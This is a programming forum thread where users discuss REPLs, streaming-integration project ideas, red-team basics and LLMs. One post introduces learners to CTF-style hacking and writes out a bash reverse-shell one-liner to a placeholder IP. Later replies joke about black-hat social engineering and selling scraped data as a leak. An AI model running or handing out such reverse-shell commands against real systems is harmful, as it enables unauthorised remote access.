Daily Programming Thread

lolipop™

34444
Low rep power
Joined
Mar 1, 2024
Posts
11
Rep Power
12
If you're using a REPL while you learn about code, you've already developed one great habit. Not every language can be toyed about with in a REPL without a lot of work, which is too bad because it's a great way to incrementally develop an idea. If you end up downloading one, I've always used bpython. it might lack features in more fancy options, but it stays out of my way for the most part.

Sometimes trying to come up with a project can lead to writers block, if you ever find yourself there just keep challenging yourself with stuff like code katas, or learning about frameworks. Even code puzzles that seem trivial end up being something you mentally put away that you'll be thankful for later.
I have been thinking about some corny ideas like a cozy stock exchange where people can use virtual currency to bet on streamers and moderators. Its something Ive thought about only for a while, but I think it would be pretty fun to make if I get more skilled with Python.

Not a very useful thing to make. Just a little thing I thought about.
 

bemis

33333
Low rep power
Joined
Mar 7, 2024
Posts
79
Rep Power
158
I've got a little server set up now that has a simple request type that goes something like "give all occurrences of this phrase between this time and that time. I think my next step will be set up some sort of authentication on it, so that if I put it somewhere for people to use it can't be abused. After that I'll have to look into making a simple webpage for it. the real bulk of it all now will be getting videos downloaded, transcribed, loaded, and then gradually optimizing the data so it can be reasonably manageable.
test-call.png
 

bemis

33333
Low rep power
Joined
Mar 7, 2024
Posts
79
Rep Power
158
I have been thinking about some corny ideas like a cozy stock exchange where people can use virtual currency to bet on streamers and moderators. Its something Ive thought about only for a while, but I think it would be pretty fun to make if I get more skilled with Python.

Not a very useful thing to make. Just a little thing I thought about.
In the last few years I've seen a lot of game engines or game-related services offering streaming platform integrations (usually twitch). Sometimes games now will allow you to go into a sort of streaming mode that allows for audience interaction. That kind of thing has been around for a long time, but the meaningfulness of the interaction has always been really shallow (avatars, emojis, etc). With the game integrations though you can effect things inside the game which is cool. I bet you could come up with something really interesting. Take for example every time a streamer says "press 1 in the chat if...". You could make something for little live polls like that.
 

lolipop™

34444
Low rep power
Joined
Mar 1, 2024
Posts
11
Rep Power
12
In the last few years I've seen a lot of game engines or game-related services offering streaming platform integrations (usually twitch). Sometimes games now will allow you to go into a sort of streaming mode that allows for audience interaction. That kind of thing has been around for a long time, but the meaningfulness of the interaction has always been really shallow (avatars, emojis, etc). With the game integrations though you can effect things inside the game which is cool. I bet you could come up with something really interesting. Take for example every time a streamer says "press 1 in the chat if...". You could make something for little live polls like that.
If Im getting what youre talking about, something similar is in DCS (that fighter jet simulator). I was on TikTok and someone was streaming DCS and every time somebody followed his TikTok, the in-game RWR (radar warning receiver) would say "thanks for the follow". Something small but really cool.

I dont have examples of this since i dont follow DCS at all but it was really cool to see.

There was another one where the chat could press certain buttons to control the jet. Really neat stuff. I have to play more video games to really think about these functions.
 

bemis

33333
Low rep power
Joined
Mar 7, 2024
Posts
79
Rep Power
158
In computer science "security" is more of a vibe than a reality. There aren't any metrics or mechanisms by which you can prove (i.e. QED) whether or not state is secure or insecure. It's just state. Computers will always do what is asked of them. When you're on a Red Team, you're just like a lawyer looking at a contract, looking for a clause you can inadvertently leverage to your advantage. Getting into Red Team activities is a lot more approachable than you'd think! If you want a fun place to learn things, check out hackthebox, or other CTF platforms (places you can legally break into things to test your skills). I just want to impart some basic things that might get somebody excited.

There is a phrase in the Red Team community: "Iterate, Foothold, Escalation".

Iteration is the probing phase. You might have heard the term "fuzzing", that's a form of iteration. It could be targeted, or brute force. essentially you are "looking for a crack". On the web, a really simple version of this would be something called "directory traversal" which really just means looking for files on a web server that aren't visible, but aren't protected either. ffuf is a tool that does that, here is what it looks like in action:
ffuf-robots-1024x699.png

Foothold is when you find a crack, and you manage to use that crack to get yourself "in the door." Most of the time we can't get the machine to let us in, but we can convince it to connect to us. This is called a reverse shell, and it can take many forms. These can get really complex, but there are still tools to make them approachable! A good one is revshells here is a dead simple one only that still works in the wild all the time:
Bash:
sh -i >& /dev/tcp/10.10.10.10/9001 0>&1
that is all it takes to send a shell to the 10.10.10.10 IP so it has access.

Escalation is the last step. Most servers have some concept of a super user, admin, root, whatever. Becoming that user on a host is the end of the journey. Once you find an attack surface to escalate yourself through, you own that box. A popular suite of tools that look for common privilege escalations is called PEASS-ng. There are flavors of it for Linux, Windows, MacOS. Most people will use it in conjunction with something out of hacktricks.

Most of this stuff would be considered "script kiddy", it doesn't take much knowledge to do any of this. However, you open yourself up to oppportunities to learn about things that push you to think outside of the box. At some point you'll find yourself tampering with compiled code in Ghidra, or writing shell code for some "return oriented programming".
 

Andrew

33344
Low rep power
Joined
Mar 4, 2024
Posts
90
Rep Power
77
Most of this stuff would be considered "script kiddy"
Never understood why "script kiddys" are mocked since that's 99% of "hacking" combined with a bit of social engineering. And unless you have access to some super secret RCE or glowie backdoor some social engineering will get you further for black hat activities. I recommend the book "Social Engineering: The Art of Human Hacking" by Christopher Hadnagy.
 

Andrew

33344
Low rep power
Joined
Mar 4, 2024
Posts
90
Rep Power
77
Or you can be a scumbag to everyone and sell scraper data as a "leaked database" ;D
 

bemis

33333
Low rep power
Joined
Mar 7, 2024
Posts
79
Rep Power
158
Never understood why "script kiddys" are mocked since that's 99% of "hacking" combined with a bit of social engineering. And unless you have access to some super secret RCE or glowie backdoor some social engineering will get you further for black hat activities. I recommend the book "Social Engineering: The Art of Human Hacking" by Christopher Hadnagy.
I agree, if the tools exist already you definitely wouldn't want to bother trying to recreate the wheel. Having lots of things to throw at the wall to see what sticks is just part of how things go unless you've got some obvious inclination. "Script kiddy" can be a loaded term, I always take it to mean somebody who tries to use the tools without learning about anything. I was that when I was young but everyone starts somewhere
 

TelosGroyp

34444
Low rep power
Joined
Mar 28, 2024
Posts
8
Rep Power
16
Here's a good, fairly non-technical introduction to LLMs by Stephen Wolfram. Hopefully it will dispel some of the more outlandish claims being made about them. I've seen many people claim ChatGPT will replace traditional search engines but this fails to take into consideration:

1). As Wolfram explains, ChatGPT simply predicts the next token given the current sequence of tokens; it can and will make things up, which means it is unreliable as a source of information.

2). Training neural networks, especially one as large as ChatGPT is very computationally expensive. This makes it difficult for the model to provide real-time information. All its current real-time capabilities are built on top of traditional search engines.

The title of the article is a bit misleading though, no one really knows why ChatGPT works. Wolfram simply offers a hypothesis.

 

bemis

33333
Low rep power
Joined
Mar 7, 2024
Posts
79
Rep Power
158
Here's a good, fairly non-technical introduction to LLMs by Stephen Wolfram. Hopefully it will dispel some of the more outlandish claims being made about them. I've seen many people claim ChatGPT will replace traditional search engines but this fails to take into consideration:

1). As Wolfram explains, ChatGPT simply predicts the next token given the current sequence of tokens; it can and will make things up, which means it is unreliable as a source of information.

2). Training neural networks, especially one as large as ChatGPT is very computationally expensive. This makes it difficult for the model to provide real-time information. All its current real-time capabilities are built on top of traditional search engines.

The title of the article is a bit misleading though, no one really knows why ChatGPT works. Wolfram simply offers a hypothesis.

Consider a “language” formed from sequences of (’s and )’s
If you know anything about How Stephan Wolfram and Gerald Sussman feel about each other the What Really Lets ChatGPT Work? section of this article becomes infinitely more hilarious. It's good to see neither side has let the grudge die.

Its dangerous that people would even consider this a "next iteration of the search engine". We already have too much of our discernment offloaded onto algorithms that clearly are blind in some crucial regard. Look at The Quartering, how does that guy exist? I can only explain him in terms of "somehow the YouTube algorithms X Y and Z'd this guy into a big audience".
 
Top